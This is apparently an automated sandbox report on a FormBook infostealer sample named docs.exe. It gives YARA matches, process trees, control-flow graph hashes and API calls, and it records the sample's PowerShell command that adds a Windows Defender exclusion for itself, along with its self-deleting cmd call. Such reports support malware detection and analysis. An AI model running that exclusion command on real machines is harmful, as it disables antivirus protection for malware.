                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                    Start time:12:16:01
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"
                                                                                                                                                                                                                    Imagebase:0xd60000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                    Start time:12:16:01
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                    Start time:12:16:01
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\docs.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\docs.exe"
                                                                                                                                                                                                                    Imagebase:0x4d0000
                                                                                                                                                                                                                    File size:740'872 bytes
                                                                                                                                                                                                                    MD5 hash:136DCC6497B13FE87BBAD4AA5F859593
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                    Start time:12:16:02
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                    Imagebase:0x7ff609140000
                                                                                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                    Start time:12:16:04
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                    Imagebase:0x7ff717f30000
                                                                                                                                                                                                                    File size:496'640 bytes
                                                                                                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                    Start time:12:16:06
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\wscript.exe"
                                                                                                                                                                                                                    Imagebase:0x580000
                                                                                                                                                                                                                    File size:147'456 bytes
                                                                                                                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                    Start time:12:16:09
Start date: 30/09/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del "C:\Users\user\Desktop\docs.exe"
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 12:16:09
Start date: 30/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 8.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 33
Total number of Limit Nodes: 3
                                                                                                                                                                                                                      execution_graph 24016 13bd578 24017 13bd5be GetCurrentProcess 24016->24017 24019 13bd610 GetCurrentThread 24017->24019 24022 13bd609 24017->24022 24020 13bd64d GetCurrentProcess 24019->24020 24023 13bd646 24019->24023 24021 13bd683 24020->24021 24024 13bd6ab GetCurrentThreadId 24021->24024 24022->24019 24023->24020 24025 13bd6dc 24024->24025 24026 13bb1f8 24029 13bb2e1 24026->24029 24027 13bb207 24030 13bb301 24029->24030 24031 13bb324 24029->24031 24030->24031 24032 13bb528 GetModuleHandleW 24030->24032 24031->24027 24033 13bb555 24032->24033 24033->24027 24034 13b4960 24035 13b4972 24034->24035 24036 13b497e 24035->24036 24038 13b4a70 24035->24038 24039 13b4a95 24038->24039 24043 13b4b71 24039->24043 24047 13b4b80 24039->24047 24044 13b4ba7 24043->24044 24045 13b4c84 24044->24045 24051 13b480c 24044->24051 24049 13b4ba7 24047->24049 24048 13b4c84 24049->24048 24050 13b480c CreateActCtxA 24049->24050 24050->24048 24052 13b5c10 CreateActCtxA 24051->24052 24054 13b5cd3 24052->24054 24055 13bd7c0 DuplicateHandle 24056 13bd856 24055->24056

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                      control_flow_graph 44 548fcd1-548fcd8 45 548fcda-548fd02 44->45 46 548fd2d-548fd2e 44->46 50 548fd09-548fd27 45->50 51 548fd04 45->51 47 548fd2f-548fd34 46->47 49 548fd36-548fd52 47->49 52 548fd5b-548fd5c 49->52 53 548fd54 49->53 50->46 51->50 56 548fead-548feb6 52->56 59 548fd61-548fd85 52->59 53->47 54 548fe18-548fe3d 53->54 55 548fe69-548fea8 53->55 53->56 57 548fda0-548fdb2 53->57 58 548fdf0-548fe13 53->58 53->59 60 548fdb4-548fdcf 53->60 61 548fd87-548fd9e 53->61 67 548fe3f-548fe4e 54->67 68 548fe50-548fe57 54->68 55->49 57->49 58->49 59->49 71 548fdda-548fdeb 60->71 61->49 69 548fe5e-548fe64 67->69 68->69 69->49 71->49
Strings
Memory Dump Source
• Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5480000_docs.jbxd
Similarity
• API ID:
• String ID: '<"C$'<"C$NvTt
• API String ID: 0-1787953242
• Opcode ID: 3d6a078eca001017240311f1f6c9105d5912534625656a97e3602636ec01320d
• Instruction ID: ced4e91d36016e8840841328b10bd4ef57d6e5dfcc94649aba72759133865736
• Opcode Fuzzy Hash: 3d6a078eca001017240311f1f6c9105d5912534625656a97e3602636ec01320d
• Instruction Fuzzy Hash: 09512874E012099FCB18DFA9D5859EEFBF2FF88300F20942AE516A7354E7745A468F50

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                      control_flow_graph 72 548fce0-548fd02 73 548fd09-548fd2e 72->73 74 548fd04 72->74 76 548fd2f-548fd34 73->76 74->73 77 548fd36-548fd52 76->77 78 548fd5b-548fd5c 77->78 79 548fd54 77->79 82 548fead-548feb6 78->82 85 548fd61-548fd85 78->85 79->76 80 548fe18-548fe3d 79->80 81 548fe69-548fea8 79->81 79->82 83 548fda0-548fdb2 79->83 84 548fdf0-548fe13 79->84 79->85 86 548fdb4-548fdcf 79->86 87 548fd87-548fd9e 79->87 93 548fe3f-548fe4e 80->93 94 548fe50-548fe57 80->94 81->77 83->77 84->77 85->77 97 548fdda-548fdeb 86->97 87->77 95 548fe5e-548fe64 93->95 94->95 95->77 97->77
Strings
Memory Dump Source
• Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5480000_docs.jbxd
Similarity
• API ID:
• String ID: '<"C$'<"C$NvTt
• API String ID: 0-1787953242
• Opcode ID: 150fed47922cbc4ea94162344520d993b16d7feb4fba47f4e79eb15534d13bd4
• Instruction ID: 9e718bd6a9a71bd7695630fde570f338c8ad23a244d8d51efd2784a1327dfc27
• Opcode Fuzzy Hash: 150fed47922cbc4ea94162344520d993b16d7feb4fba47f4e79eb15534d13bd4
• Instruction Fuzzy Hash: 8A51F774E01209DFCB18DFAAD5855EEFBF2BF88300F20982AE516A7354E7345A468F54

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                      control_flow_graph 891 548d2e0-548d305 892 548d30c-548d329 891->892 893 548d307 891->893 894 548d331 892->894 893->892 895 548d338-548d354 894->895 896 548d35d-548d35e 895->896 897 548d356 895->897 907 548d363-548d36f 896->907 909 548d6f8-548d70b 896->909 897->894 898 548d688-548d6ad 897->898 899 548d628-548d62c 897->899 900 548d5e9-548d5ef 897->900 901 548d4ea-548d4ff 897->901 902 548d54b-548d55d 897->902 903 548d38d-548d399 897->903 904 548d46d-548d47a 897->904 905 548d60e-548d623 897->905 906 548d562-548d579 897->906 897->907 908 548d504-548d516 897->908 897->909 910 548d658-548d65c 897->910 911 548d598-548d5a4 897->911 912 548d499-548d4b0 897->912 913 548d41a-548d432 897->913 914 548d51b-548d51f 897->914 915 548d6dc-548d6f3 897->915 916 548d3de-548d3f0 897->916 917 548d47f-548d494 897->917 918 548d6b2-548d6be 897->918 919 548d4b5-548d4be 897->919 920 548d3f5-548d415 897->920 898->895 921 548d62e-548d63d 899->921 922 548d63f-548d646 899->922 947 548d5f7-548d609 900->947 901->895 902->895 929 548d39b 903->929 930 548d3a0-548d3b6 903->930 904->895 905->895 962 548d57b call 548d910 906->962 963 548d57b call 548d920 906->963 923 548d371 907->923 924 548d376-548d38b 907->924 908->895 925 548d65e-548d66d 910->925 926 548d66f-548d676 910->926 935 548d5ab-548d5c1 911->935 936 548d5a6 911->936 912->895 937 548d439-548d44f 913->937 938 548d434 913->938 933 548d521-548d530 914->933 934 548d532-548d539 914->934 915->895 916->895 917->895 931 548d6c0 918->931 932 548d6c5-548d6d7 918->932 927 548d4c0-548d4cf 919->927 928 548d4d1-548d4d8 919->928 920->895 939 548d64d-548d653 921->939 922->939 923->924 924->895 940 548d67d-548d683 925->940 926->940 941 548d4df-548d4e5 927->941 928->941 929->930 953 548d3b8 930->953 954 548d3bd-548d3d9 930->954 931->932 932->895 943 
548d540-548d546 933->943 934->943 955 548d5c8-548d5e4 935->955 956 548d5c3 935->956 936->935 957 548d451 937->957 958 548d456-548d468 937->958 938->937 939->895 940->895 941->895 943->895 944 548d581-548d593 944->895 947->895 953->954 954->895 955->895 956->955 957->958 958->895 962->944 963->944
Memory Dump Source
• Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5480000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1de874fdf008eec0a59139614ff052465a9fd2bfdd0a5dc01b5b1b982d743462
• Instruction ID: 07c34c254706e82655f7eafa691fc3764fdfca51899f92b401230556bffc888d
• Opcode Fuzzy Hash: 1de874fdf008eec0a59139614ff052465a9fd2bfdd0a5dc01b5b1b982d743462
• Instruction Fuzzy Hash: 22D16970D1530ADFCB08DF99D5808EEFBB2FF89310B64955AD415AB294D734AA82CF90

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                      control_flow_graph 964 548d2ca-548d305 966 548d30c-548d329 964->966 967 548d307 964->967 968 548d331 966->968 967->966 969 548d338-548d354 968->969 970 548d35d-548d35e 969->970 971 548d356 969->971 981 548d363-548d36f 970->981 983 548d6f8-548d70b 970->983 971->968 972 548d688-548d6ad 971->972 973 548d628-548d62c 971->973 974 548d5e9-548d5ef 971->974 975 548d4ea-548d4ff 971->975 976 548d54b-548d55d 971->976 977 548d38d-548d399 971->977 978 548d46d-548d47a 971->978 979 548d60e-548d623 971->979 980 548d562-548d579 971->980 971->981 982 548d504-548d516 971->982 971->983 984 548d658-548d65c 971->984 985 548d598-548d5a4 971->985 986 548d499-548d4b0 971->986 987 548d41a-548d432 971->987 988 548d51b-548d51f 971->988 989 548d6dc-548d6f3 971->989 990 548d3de-548d3f0 971->990 991 548d47f-548d494 971->991 992 548d6b2-548d6be 971->992 993 548d4b5-548d4be 971->993 994 548d3f5-548d415 971->994 972->969 995 548d62e-548d63d 973->995 996 548d63f-548d646 973->996 1021 548d5f7-548d609 974->1021 975->969 976->969 1003 548d39b 977->1003 1004 548d3a0-548d3b6 977->1004 978->969 979->969 1036 548d57b call 548d910 980->1036 1037 548d57b call 548d920 980->1037 997 548d371 981->997 998 548d376-548d38b 981->998 982->969 999 548d65e-548d66d 984->999 1000 548d66f-548d676 984->1000 1009 548d5ab-548d5c1 985->1009 1010 548d5a6 985->1010 986->969 1011 548d439-548d44f 987->1011 1012 548d434 987->1012 1007 548d521-548d530 988->1007 1008 548d532-548d539 988->1008 989->969 990->969 991->969 1005 548d6c0 992->1005 1006 548d6c5-548d6d7 992->1006 1001 548d4c0-548d4cf 993->1001 1002 548d4d1-548d4d8 993->1002 994->969 1013 548d64d-548d653 995->1013 996->1013 997->998 998->969 1014 548d67d-548d683 999->1014 1000->1014 1015 548d4df-548d4e5 1001->1015 1002->1015 1003->1004 1027 548d3b8 1004->1027 1028 
548d3bd-548d3d9 1004->1028 1005->1006 1006->969 1017 548d540-548d546 1007->1017 1008->1017 1029 548d5c8-548d5e4 1009->1029 1030 548d5c3 1009->1030 1010->1009 1031 548d451 1011->1031 1032 548d456-548d468 1011->1032 1012->1011 1013->969 1014->969 1015->969 1017->969 1018 548d581-548d593 1018->969 1021->969 1027->1028 1028->969 1029->969 1030->1029 1031->1032 1032->969 1036->1018 1037->1018
Memory Dump Source
• Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5480000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b5e4716b6eb81177a3af1d8670f0a6dcb9b6f81ccd138413452af9495ab0fc2
• Instruction ID: f323c8418e765c64fdb4ea8cd23b269fe996fa2488f7bce84003e22a79b54e60
• Opcode Fuzzy Hash: 3b5e4716b6eb81177a3af1d8670f0a6dcb9b6f81ccd138413452af9495ab0fc2
• Instruction Fuzzy Hash: 1ED14770D1120ADFCB08DF99D5818EEFBB2FF89310B64955AD415AB294D734EA82CF90
Memory Dump Source
• Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5480000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e0b0159cbf981139ae5d297f030f1bc710104347f708070c19619364526ff951
• Instruction ID: 13e1a459def51910cc06fcb2d1193ed01ba7734fa6492065608736d150b7e0d5
• Opcode Fuzzy Hash: e0b0159cbf981139ae5d297f030f1bc710104347f708070c19619364526ff951
• Instruction Fuzzy Hash: 0381C374E002098FDB08DFAAC984AEEFBB2FF88300F24952AD515AB354DB355906CF54
Memory Dump Source
• Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5480000_docs.jbxd
Similarity
• API ID:
• String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a17a02b21587fe26ddc099154ad814028c12c79c58da5e31bf3325dfa75fbd63
                                                                                                                                                                                                                      • Instruction ID: 6fb918726ec7d75d1342d2bf1f8ad3add7cd615d23130cfe864ebeae8d093873
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a17a02b21587fe26ddc099154ad814028c12c79c58da5e31bf3325dfa75fbd63
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2981AF74E00619CFDB08DFAAC984AEEFBB2FF88300F24952AD515AB354DB355906CB50
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a300d55ebf82200660a2cc42398736e90f4ef1eb3c3e714584ef572fa19f05fe
                                                                                                                                                                                                                      • Instruction ID: b67f4f24a044d0e88c643334ad325174741a6de46984cfdfdbff9aacec5430a4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a300d55ebf82200660a2cc42398736e90f4ef1eb3c3e714584ef572fa19f05fe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA511670E14209AFCB08DFA5D9859EEFBB2FF88310F10D46AE416E7254DB749A058F54
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fe56e515e1710ffaa7efc3757d4e91baa211ea512bd0310efe9596ef628a8416
                                                                                                                                                                                                                      • Instruction ID: 7506b8d58b9ad6aa140734b8898a83c5764c31c326a82d98714e6d7d3f2b1168
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe56e515e1710ffaa7efc3757d4e91baa211ea512bd0310efe9596ef628a8416
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE511470E14209AFCB08DFA5D9855EEFBB2FF88310F10E46AE416E7254DB749A058F54
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fc9e915960bffd98eaa95fd1a17be7fdd7c87556d45919908382a7ee4925028c
                                                                                                                                                                                                                      • Instruction ID: a1f6dd040adb21d0669ac3fa4c63846bce27541e1abdb695230024c301a61133
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc9e915960bffd98eaa95fd1a17be7fdd7c87556d45919908382a7ee4925028c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E21EAB1E006588BEB18CFAAC9847DEBBF7AFC8300F14C16AD409A6354DB745949CF90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: bcc4f98a4c84b2158e4f66653dca1bf490e3cb82c4c804abc4ab6abb9b55a284
                                                                                                                                                                                                                      • Instruction ID: efb0ee8c9c669438abc5abda11bedeb60f7ddc77fcf43d25bed401efd8adbd8e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcc4f98a4c84b2158e4f66653dca1bf490e3cb82c4c804abc4ab6abb9b55a284
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C021D671E006188BEB18CFAAD9447DEFBF7AFC8310F14C16AD509A6354DB741A558F90

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 013BD5F6
• GetCurrentThread.KERNEL32 ref: 013BD633
• GetCurrentProcess.KERNEL32 ref: 013BD670
• GetCurrentThreadId.KERNEL32 ref: 013BD6C9
Memory Dump Source
• Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 9f36bbb88c969ff67054e2fd3bd648553ac496e8bcb2c8499258b37b5ae76806
• Instruction ID: bd352f5dbd040e9a723344f032d83d0b8a283a2d95c53780cbf108078276996c
• Opcode Fuzzy Hash: 9f36bbb88c969ff67054e2fd3bd648553ac496e8bcb2c8499258b37b5ae76806
• Instruction Fuzzy Hash: 005166B090034A8FDB04CFA9D588BEEBBF1EF88318F208459D509A7260DBB55944CF25

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 013BD5F6
• GetCurrentThread.KERNEL32 ref: 013BD633
• GetCurrentProcess.KERNEL32 ref: 013BD670
• GetCurrentThreadId.KERNEL32 ref: 013BD6C9
Memory Dump Source
• Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 050e5a0e6e0b6a51cb9b2b2ccc49b53787f2e36fcfbd987c0ff5546eaeafac23
• Instruction ID: 2257b6f36aa6399d228f86f5aa6dac121ab4c7146b7c3a52201e9bdadc8ad7b3
• Opcode Fuzzy Hash: 050e5a0e6e0b6a51cb9b2b2ccc49b53787f2e36fcfbd987c0ff5546eaeafac23
• Instruction Fuzzy Hash: 5F5122B090024ACFDB54CFAAD588BDEBBF1AF88318F208459D509A7260DBB59944CB65

Control-flow Graph

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 013BB546
Memory Dump Source
• Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
